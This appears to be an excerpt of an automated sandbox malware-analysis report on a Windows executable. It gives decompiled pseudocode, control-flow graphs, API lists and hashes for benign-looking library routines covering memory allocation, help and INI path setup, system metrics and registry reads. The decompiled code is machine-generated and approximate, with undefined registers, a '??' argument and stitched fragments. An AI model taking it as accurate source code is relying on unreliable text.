                                                                              • Opcode ID: 7659dfa4048c2dd70053846793dcdc97d36c6b9409b199952d3fe3ae08ef78d9
                                                                              • Instruction ID: 31c2921b573d0aa8b791fa0ac913be43e08c1e9334c7daa0cce932c98964dfed
                                                                              • Opcode Fuzzy Hash: 7659dfa4048c2dd70053846793dcdc97d36c6b9409b199952d3fe3ae08ef78d9
                                                                              • Instruction Fuzzy Hash: 383339B6C0514CB9DB01EAE5DD95CDFBFBCAE16308F04416BB816B3192EA385B08C675
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042DB8C, Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1108 42db8c-42dbab EnterCriticalSection 1109 42dbba-42dbbf 1108->1109 1110 42dbad-42dbb4 1108->1110 1112 42dbc1-42dbc4 1109->1112 1113 42dbdc-42dbe4 1109->1113 1110->1109 1111 42dc6e-42dc71 1110->1111 1114 42dc73-42dc76 1111->1114 1115 42dc79-42dc97 LeaveCriticalSection 1111->1115 1116 42dbc7-42dbca 1112->1116 1117 42dbf6-42dc15 GlobalHandle GlobalUnlock GlobalReAlloc 1113->1117 1118 42dbe6-42dbf4 GlobalAlloc 1113->1118 1114->1115 1119 42dbd4-42dbd6 1116->1119 1120 42dbcc-42dbd2 1116->1120 1121 42dc1b-42dc1d 1117->1121 1118->1121 1119->1111 1119->1113 1120->1116 1120->1119 1122 42dc42-42dc6b GlobalLock call 412140 1121->1122 1123 42dc1f-42dc24 1121->1123 1122->1111 1125 42dc26-42dc2e GlobalHandle GlobalLock 1123->1125 1126 42dc34-42dc37 LeaveCriticalSection 1123->1126 1125->1126 1126->1122
                                                                              C-Code - Quality: 83%
                                                                              			E0042DB8C(signed char* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				char _v32;
				char _v40;
				char _v48;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t41;
				intOrPtr _t42;
				void* _t43;
				void* _t44;
				void* _t48;
				void* _t49;
				signed int _t70;
				signed char* _t72;
				signed int _t81;
				signed char* _t84;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_t72 = __ecx;
				_t88 = _t93;
				_push(__ecx);
				_push(__ecx);
				_t84 = __ecx;
				_t1 = _t84 + 0x1c; // 0x45a0f4
				_t41 = _t1;
				_v8 = _t41;
				EnterCriticalSection(_t41);
				_t3 = _t84 + 4; // 0x20
				_t42 =  *_t3;
				_t4 = _t84 + 8; // 0x3
				if( *_t4 >= _t42) {
					L5:
					_t81 = 1;
					if(_t42 <= 1) {
						L10:
						_t19 = _t42 + 0x20; // 0x40
						_t70 = _t19;
						_t20 = _t84 + 0x10; // 0x5e00a8
						_t43 =  *_t20;
						if(_t43 != 0) {
							_t44 = GlobalHandle(_t43);
							_v12 = _t44;
							GlobalUnlock(_t44);
							_t48 = GlobalReAlloc(_v12, _t70 << 3, 0x2002);
						} else {
							_t48 = GlobalAlloc(2, _t70 << 3); // executed
						}
						if(_t48 != 0) {
							_t49 = GlobalLock(_t48);
							_t25 = _t84 + 4; // 0x20
							_v12 = _t49;
							E00412140(_t49 +  *_t25 * 8, 0, _t70 -  *_t25 << 3);
							 *(_t84 + 4) = _t70;
							 *(_t84 + 0x10) = _v12;
							goto L18;
						} else {
							_t23 = _t84 + 0x10; // 0x5e00a8
							_t86 =  *_t23;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v8);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v32 = 0x458438;
							E004128BF( &_v32, 0x451a38);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v40 = 0x4584d0;
							E004128BF( &_v40, 0x451a7c);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v48 = 0x458568;
							E004128BF( &_v48, 0x451ac0);
							asm("int3");
							return 0x44b528;
						}
					} else {
						_t16 = _t84 + 0x10; // 0x5e00a8
						_t72 =  *_t16 + 8;
						while(( *_t72 & 0x00000001) != 0) {
							_t81 = _t81 + 1;
							_t72 =  &(_t72[8]);
							if(_t81 < _t42) {
								continue;
							}
							break;
						}
						if(_t81 < _t42) {
							goto L18;
						} else {
							goto L10;
						}
					}
				} else {
					_t11 = __esi + 0x10; // 0x5e00a8
					__ecx =  *_t11;
					if(( *( *_t11 + __edi * 8) & 0x00000001) == 0) {
						L18:
						_t32 = _t84 + 0xc; // 0x3
						if(_t81 >=  *_t32) {
							_t33 = _t81 + 1; // 0x4
							 *((intOrPtr*)(_t84 + 0xc)) = _t33;
						}
						_t35 = _t84 + 0x10; // 0x5e00a8
						 *( *_t35 + _t81 * 8) =  *( *_t35 + _t81 * 8) | 0x00000001;
						_t39 = _t81 + 1; // 0x4
						 *((intOrPtr*)(_t84 + 8)) = _t39;
						LeaveCriticalSection(_v8);
						return _t81;
					} else {
						goto L5;
					}
				}
			}

























                                                                              0x0042db8c
                                                                              0x0042db8d
                                                                              0x0042db8f
                                                                              0x0042db90
                                                                              0x0042db93
                                                                              0x0042db95
                                                                              0x0042db95
                                                                              0x0042db9a
                                                                              0x0042db9d
                                                                              0x0042dba3
                                                                              0x0042dba3
                                                                              0x0042dba6
                                                                              0x0042dbab
                                                                              0x0042dbba
                                                                              0x0042dbbc
                                                                              0x0042dbbf
                                                                              0x0042dbdc
                                                                              0x0042dbdc
                                                                              0x0042dbdc
                                                                              0x0042dbdf
                                                                              0x0042dbdf
                                                                              0x0042dbe4
                                                                              0x0042dbf7
                                                                              0x0042dbfe
                                                                              0x0042dc01
                                                                              0x0042dc15
                                                                              0x0042dbe6
                                                                              0x0042dbee
                                                                              0x0042dbee
                                                                              0x0042dc1d
                                                                              0x0042dc43
                                                                              0x0042dc49
                                                                              0x0042dc54
                                                                              0x0042dc5d
                                                                              0x0042dc68
                                                                              0x0042dc6b
                                                                              0x00000000
                                                                              0x0042dc1f
                                                                              0x0042dc1f
                                                                              0x0042dc1f
                                                                              0x0042dc24
                                                                              0x0042dc2e
                                                                              0x0042dc2e
                                                                              0x0042dc37
                                                                              0x00422eaf
                                                                              0x00422eb0
                                                                              0x00422eb2
                                                                              0x00422ebc
                                                                              0x00422ec3
                                                                              0x00422ec8
                                                                              0x00422ec9
                                                                              0x00422eca
                                                                              0x00422ecc
                                                                              0x00422ed6
                                                                              0x00422edd
                                                                              0x00422ee2
                                                                              0x00422ee3
                                                                              0x00422ee6
                                                                              0x00422ef0
                                                                              0x00422ef7
                                                                              0x00422efc
                                                                              0x00422f02
                                                                              0x00422f02
                                                                              0x0042dbc1
                                                                              0x0042dbc1
                                                                              0x0042dbc4
                                                                              0x0042dbc7
                                                                              0x0042dbcc
                                                                              0x0042dbcd
                                                                              0x0042dbd2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042dbd2
                                                                              0x0042dbd6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042dbd6
                                                                              0x0042dbad
                                                                              0x0042dbad
                                                                              0x0042dbad
                                                                              0x0042dbb4
                                                                              0x0042dc6e
                                                                              0x0042dc6e
                                                                              0x0042dc71
                                                                              0x0042dc73
                                                                              0x0042dc76
                                                                              0x0042dc76
                                                                              0x0042dc79
                                                                              0x0042dc82
                                                                              0x0042dc85
                                                                              0x0042dc88
                                                                              0x0042dc8b
                                                                              0x0042dc97
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042dbb4

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0045A0F4,74B04DE0,?,?,0045A0D8,0045A0D8,?,0042E0C8,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA,0042A1C0), ref: 0042DB9D
                                                                              • GlobalAlloc.KERNELBASE(00000002,00000040,?,?,0045A0D8,0045A0D8,?,0042E0C8,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA,0042A1C0), ref: 0042DBEE
                                                                              • GlobalHandle.KERNEL32(005E00A8), ref: 0042DBF7
                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,0045A0D8,0045A0D8,?,0042E0C8,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA,0042A1C0,74B04DE0), ref: 0042DC01
                                                                              • GlobalReAlloc.KERNEL32 ref: 0042DC15
                                                                              • GlobalHandle.KERNEL32(005E00A8), ref: 0042DC27
                                                                              • GlobalLock.KERNEL32 ref: 0042DC2E
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0045A0D8,0045A0D8,?,0042E0C8,74B04DE0,00000000,?,0042D188,0042CC8D,0042D1A4,004239CA,0042A1C0,74B04DE0), ref: 0042DC37
                                                                              • GlobalLock.KERNEL32 ref: 0042DC43
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0042DC8B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                              • String ID:
                                                                              • API String ID: 2667261700-0
                                                                              • Opcode ID: 55d33e081a608ed79ff8c8c6c1387b7713cef4b45d6e0938ab5c24c9294444c8
                                                                              • Instruction ID: 5151ff8eace3e0ffd6cd1ca8c0d63771c81277211bd7299c0ab29f85b6c7337c
                                                                              • Opcode Fuzzy Hash: 55d33e081a608ed79ff8c8c6c1387b7713cef4b45d6e0938ab5c24c9294444c8
                                                                              • Instruction Fuzzy Hash: 5B31AD70A00715AFCB24CF65EE48A5ABBF9FF84300B01896EE942D3260D7B4F945CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E480, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105stringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1128 42e480-42e4c9 call 42d179 GetModuleFileNameA 1131 42e4cb-42e4cd 1128->1131 1132 42e4cf call 42a382 1128->1132 1131->1132 1133 42e4d4-42e4e6 PathFindExtensionA 1131->1133 1132->1133 1135 42e4e8 call 42a382 1133->1135 1136 42e4ed-42e509 call 42e451 1133->1136 1135->1136 1140 42e510-42e515 1136->1140 1141 42e50b call 42a382 1136->1141 1143 42e527-42e52a 1140->1143 1144 42e517-42e524 call 4131c4 1140->1144 1141->1140 1146 42e555-42e55e 1143->1146 1147 42e52c-42e541 call 428c25 1143->1147 1144->1143 1148 42e560-42e564 1146->1148 1149 42e591-42e594 1146->1149 1159 42e543-42e547 1147->1159 1160 42e549 1147->1160 1152 42e566-42e56b 1148->1152 1153 42e56d 1148->1153 1154 42e596-42e5b5 lstrcatA call 4131c4 1149->1154 1155 42e5b8-42e5cd call 412fbb 1149->1155 1157 42e572-42e58e lstrcpyA call 4131c4 1152->1157 1153->1157 1154->1155 1157->1149 1164 42e54c-42e552 call 4131c4 1159->1164 1160->1164 1164->1146
                                                                              C-Code - Quality: 76%
                                                                              			E0042E480(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* __ebp;
				intOrPtr _t35;
				long _t40;
				CHAR* _t43;
				void* _t65;
				void* _t78;
				void* _t80;
				void* _t82;

				_t67 = __ecx;
				_t80 = _t82 - 0x290;
				_t35 =  *0x457184; // 0xb7aa1229
				 *((intOrPtr*)(_t80 + 0x28c)) = _t35;
				_t78 = __ecx;
				_t65 = E0042D179();
				 *(_t65 + 8) =  *(_t78 + 0x40);
				 *(_t65 + 0xc) =  *(_t78 + 0x40);
				_t40 = GetModuleFileNameA( *(_t78 + 0x40), _t80 + 0x84, 0x104);
				if(_t40 == 0 || _t40 == 0x104) {
					E0042A382(_t67);
				}
				_t43 = PathFindExtensionA(_t80 + 0x84); // executed
				 *(_t80 - 0x80) = _t43;
				if(_t43 == 0) {
					E0042A382(_t67);
				}
				 *( *(_t80 - 0x80)) = 0;
				if(E0042E451(_t80 + 0x84, _t80 + 0x188, 0x104) != 0) {
					E0042A382(_t67);
				}
				if( *((intOrPtr*)(_t78 + 0x5c)) == 0) {
					 *((intOrPtr*)(_t78 + 0x5c)) = E004131C4(_t80 + 0x188);
				}
				if( *(_t78 + 0x4c) == 0) {
					if(E00428C25(0xe000, _t80 - 0x7c, 0x100) == 0) {
						_push( *((intOrPtr*)(_t78 + 0x5c)));
					} else {
						_push(_t80 - 0x7c);
					}
					 *(_t78 + 0x4c) = E004131C4();
				}
				_t48 =  *(_t78 + 0x4c);
				 *(_t65 + 0x10) =  *(_t78 + 0x4c);
				if( *((intOrPtr*)(_t78 + 0x60)) == 0) {
					if( *((intOrPtr*)(_t78 + 0x68)) != 1) {
						_push(".HLP");
					} else {
						_push(".CHM");
					}
					lstrcpyA( *(_t80 - 0x80), ??);
					 *((intOrPtr*)(_t78 + 0x60)) = E004131C4(_t80 + 0x84);
					_t48 =  *(_t80 - 0x80);
					 *( *(_t80 - 0x80)) = 0;
				}
				if( *((intOrPtr*)(_t78 + 0x64)) == 0) {
					lstrcatA(_t80 + 0x188, ".INI");
					 *((intOrPtr*)(_t78 + 0x64)) = E004131C4(_t80 + 0x188);
				}
				return E00412FBB(_t48,  *((intOrPtr*)(_t80 + 0x28c)));
			}











                                                                              0x0042e480
                                                                              0x0042e481
                                                                              0x0042e48e
                                                                              0x0042e496
                                                                              0x0042e49c
                                                                              0x0042e4a3
                                                                              0x0042e4a8
                                                                              0x0042e4ae
                                                                              0x0042e4c1
                                                                              0x0042e4c9
                                                                              0x0042e4cf
                                                                              0x0042e4cf
                                                                              0x0042e4db
                                                                              0x0042e4e3
                                                                              0x0042e4e6
                                                                              0x0042e4e8
                                                                              0x0042e4e8
                                                                              0x0042e4f0
                                                                              0x0042e509
                                                                              0x0042e50b
                                                                              0x0042e50b
                                                                              0x0042e515
                                                                              0x0042e524
                                                                              0x0042e524
                                                                              0x0042e52a
                                                                              0x0042e541
                                                                              0x0042e549
                                                                              0x0042e543
                                                                              0x0042e546
                                                                              0x0042e546
                                                                              0x0042e552
                                                                              0x0042e552
                                                                              0x0042e555
                                                                              0x0042e558
                                                                              0x0042e55e
                                                                              0x0042e564
                                                                              0x0042e56d
                                                                              0x0042e566
                                                                              0x0042e566
                                                                              0x0042e566
                                                                              0x0042e575
                                                                              0x0042e587
                                                                              0x0042e58a
                                                                              0x0042e58e
                                                                              0x0042e58e
                                                                              0x0042e594
                                                                              0x0042e5a2
                                                                              0x0042e5b5
                                                                              0x0042e5b5
                                                                              0x0042e5cd

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042E4C1
                                                                              • PathFindExtensionA.KERNELBASE(?), ref: 0042E4DB
                                                                              • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042E575
                                                                              • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042E5A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                              • String ID: .CHM$.HLP$.INI
                                                                              • API String ID: 2140653559-4017452060
                                                                              • Opcode ID: 53a99e2f1d3c8ef1a8b7f41c32cb084a245127436117a779d48c3922d1480061
                                                                              • Instruction ID: 63ea58bfbce8c7fa5a9daef6ef929e1c48f7f43424eb3444c0f7fb182fa2d7e9
                                                                              • Opcode Fuzzy Hash: 53a99e2f1d3c8ef1a8b7f41c32cb084a245127436117a779d48c3922d1480061
                                                                              • Instruction Fuzzy Hash: E9413271600754AFDB31EFAAEC44ADA77E8BB04348F50482BF945D7241EB78D640CB25
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00428BCB, Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              C-Code - Quality: 100%
                                                                              			E00428BCB(void* __ecx) {
				int _t5;
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t19 + 8)) = _t5;
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x45a310 = GetSystemMetrics(2) + 1;
				 *0x45a314 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}






                                                                              0x00428bd6
                                                                              0x00428bd8
                                                                              0x00428bdc
                                                                              0x00428be3
                                                                              0x00428beb
                                                                              0x00428bf5
                                                                              0x00428c06
                                                                              0x00428c10
                                                                              0x00428c18
                                                                              0x00428c24

                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL ref: 00428BD8
                                                                              • GetSystemMetrics.USER32 ref: 00428BDF
                                                                              • GetSystemMetrics.USER32 ref: 00428BE6
                                                                              • GetSystemMetrics.USER32 ref: 00428BF0
                                                                              • GetDC.USER32(00000000), ref: 00428BFA
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00428C0B
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00428C13
                                                                              • ReleaseDC.USER32 ref: 00428C1B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                              • String ID:
                                                                              • API String ID: 1031845853-0
                                                                              • Opcode ID: 0ff0594fa1ac5c0d24070ad7f7d78c5d9afa5e582a6233197286299b07487db1
                                                                              • Instruction ID: b7a61e8c6927174e9985a73cde8d92fe2022ff0e0a374240345f3f584badab39
                                                                              • Opcode Fuzzy Hash: 0ff0594fa1ac5c0d24070ad7f7d78c5d9afa5e582a6233197286299b07487db1
                                                                              • Instruction Fuzzy Hash: F0F03071A40704AEE7206F729C4DF277BA4EB81B21F11492AEB418B2D0D7F9D8058F94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E5CE, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1170 42e5ce-42e5fa SetErrorMode * 2 call 42d179 * 2 1175 42e614-42e61e call 42d179 1170->1175 1176 42e5fc-42e60f call 42e480 1170->1176 1180 42e620 call 423e66 1175->1180 1181 42e625-42e632 GetModuleHandleA 1175->1181 1176->1175 1180->1181 1183 42e634-42e640 GetProcAddress 1181->1183 1184 42e645-42e648 1181->1184 1183->1184
                                                                              C-Code - Quality: 100%
                                                                              			E0042E5CE(intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				signed int _t11;
				void* _t14;
				intOrPtr _t16;
				struct HINSTANCE__* _t18;
				void* _t24;
				void* _t28;
				intOrPtr _t31;

				_t11 = SetErrorMode(0); // executed
				SetErrorMode(_t11 | 0x00008001); // executed
				_t14 = E0042D179();
				_t31 = _a4;
				 *((intOrPtr*)(_t14 + 8)) = _t31;
				 *((intOrPtr*)(_t14 + 0xc)) = _t31;
				_t16 =  *((intOrPtr*)(E0042D179() + 4));
				if(_t16 != 0) {
					 *((intOrPtr*)(_t16 + 0x44)) = _a12;
					 *((intOrPtr*)(_t16 + 0x48)) = _a16;
					 *((intOrPtr*)(_t16 + 0x40)) = _t31;
					E0042E480(_t24, _t16, _t28, _t31);
				}
				if( *((char*)(E0042D179() + 0x14)) == 0) {
					E00423E66();
				}
				_t18 = GetModuleHandleA("user32.dll");
				if(_t18 != 0) {
					 *0x459e34 = GetProcAddress(_t18, "NotifyWinEvent");
				}
				return 1;
			}











                                                                              0x0042e5d7
                                                                              0x0042e5df
                                                                              0x0042e5e1
                                                                              0x0042e5e6
                                                                              0x0042e5ea
                                                                              0x0042e5ed
                                                                              0x0042e5f5
                                                                              0x0042e5fa
                                                                              0x0042e600
                                                                              0x0042e607
                                                                              0x0042e60c
                                                                              0x0042e60f
                                                                              0x0042e60f
                                                                              0x0042e61e
                                                                              0x0042e620
                                                                              0x0042e620
                                                                              0x0042e62a
                                                                              0x0042e632
                                                                              0x0042e640
                                                                              0x0042e640
                                                                              0x0042e648

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00000000,00000000,0042A1DF,?,?,?,?,74B04DE0,00000000,?,00412EE2,00000000), ref: 0042E5D7
                                                                              • SetErrorMode.KERNELBASE(00000000,?,00412EE2,00000000), ref: 0042E5DF
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,00412EE2,00000000), ref: 0042E62A
                                                                              • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0042E63A
                                                                                • Part of subcall function 0042E480: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042E4C1
                                                                                • Part of subcall function 0042E480: PathFindExtensionA.KERNELBASE(?), ref: 0042E4DB
                                                                                • Part of subcall function 0042E480: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042E575
                                                                                • Part of subcall function 0042E480: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042E5A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                              • String ID: NotifyWinEvent$user32.dll
                                                                              • API String ID: 4004864024-597752486
                                                                              • Opcode ID: a5b2d7178a0d74abec4258be8a62055373884c13397991c79847c81a81a4471c
                                                                              • Instruction ID: 3b5f070e76ef6d1bd0a9a0da8e866c539bf35f3abd7e40ae7ba4e1952652faae
                                                                              • Opcode Fuzzy Hash: a5b2d7178a0d74abec4258be8a62055373884c13397991c79847c81a81a4471c
                                                                              • Instruction Fuzzy Hash: 40016DB0B143208FEB20EF66E909A1A3BA8AF44745F45449FF54497362DB78D844CB6A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C51F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1185 42c51f-42c54d 1186 42c553 1185->1186 1187 42c5db-42c5e8 RegCloseKey 1185->1187 1188 42c554-42c56a RegOpenKeyExA 1186->1188 1189 42c5c3-42c5d4 RegCloseKey 1188->1189 1190 42c56c-42c56f 1188->1190 1189->1188 1191 42c5da 1189->1191 1192 42c5bd-42c5c1 1190->1192 1191->1187 1192->1189 1193 42c571-42c58a RegQueryValueExA 1192->1193 1194 42c58c-42c590 1193->1194 1195 42c5ad-42c5ba 1193->1195 1194->1195 1196 42c592-42c59b 1194->1196 1195->1192 1197 42c5a5-42c5a7 1196->1197 1198 42c59d-42c5a3 1196->1198 1197->1195 1198->1195
                                                                              C-Code - Quality: 100%
                                                                              			E0042C51F(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				long _t30;
				char* _t32;
				intOrPtr _t34;
				char** _t35;
				signed int _t40;
				char** _t44;
				char* _t46;

				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				_t46 =  *0x456168; // 0x449294
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t35 = 0x456168;
				if(_t46 == 0) {
					L13:
					RegCloseKey(0);
					return 1;
				}
				do {
					_t30 = RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8); // executed
					if(_t30 != 0) {
						goto L11;
					}
					_t8 =  &(_t35[1]); // 0x456130
					_t44 =  *_t8;
					while(1) {
						_t32 =  *_t44;
						if(_t32 == 0) {
							goto L11;
						}
						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t34 = _v20;
							_t16 =  &(_t44[1]); // 0x1
							_t40 =  *_t16;
							if(_v12 == 0) {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
							} else {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t44 =  &(_t44[2]);
					}
					L11:
					RegCloseKey(_v8);
					_t35 =  &(_t35[2]);
					_v8 = 0;
				} while ( *_t35 != 0);
				goto L13;
			}















                                                                              0x0042c529
                                                                              0x0042c52f
                                                                              0x0042c535
                                                                              0x0042c538
                                                                              0x0042c53b
                                                                              0x0042c53e
                                                                              0x0042c545
                                                                              0x0042c548
                                                                              0x0042c54d
                                                                              0x0042c5db
                                                                              0x0042c5dc
                                                                              0x0042c5e8
                                                                              0x0042c5e8
                                                                              0x0042c554
                                                                              0x0042c562
                                                                              0x0042c56a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c56c
                                                                              0x0042c56c
                                                                              0x0042c5bd
                                                                              0x0042c5bd
                                                                              0x0042c5c1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c58a
                                                                              0x0042c595
                                                                              0x0042c598
                                                                              0x0042c598
                                                                              0x0042c59b
                                                                              0x0042c5a7
                                                                              0x0042c59d
                                                                              0x0042c59d
                                                                              0x0042c59d
                                                                              0x0042c59b
                                                                              0x0042c5ad
                                                                              0x0042c5b0
                                                                              0x0042c5b7
                                                                              0x0042c5ba
                                                                              0x0042c5ba
                                                                              0x0042c5c3
                                                                              0x0042c5c6
                                                                              0x0042c5cc
                                                                              0x0042c5d1
                                                                              0x0042c5d1
                                                                              0x00000000

                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00456168,00000000,00000001,?), ref: 0042C562
                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 0042C582
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042C5C6
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0042C5DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Close$OpenQueryValue
                                                                              • String ID: haE
                                                                              • API String ID: 1607946009-3285560435
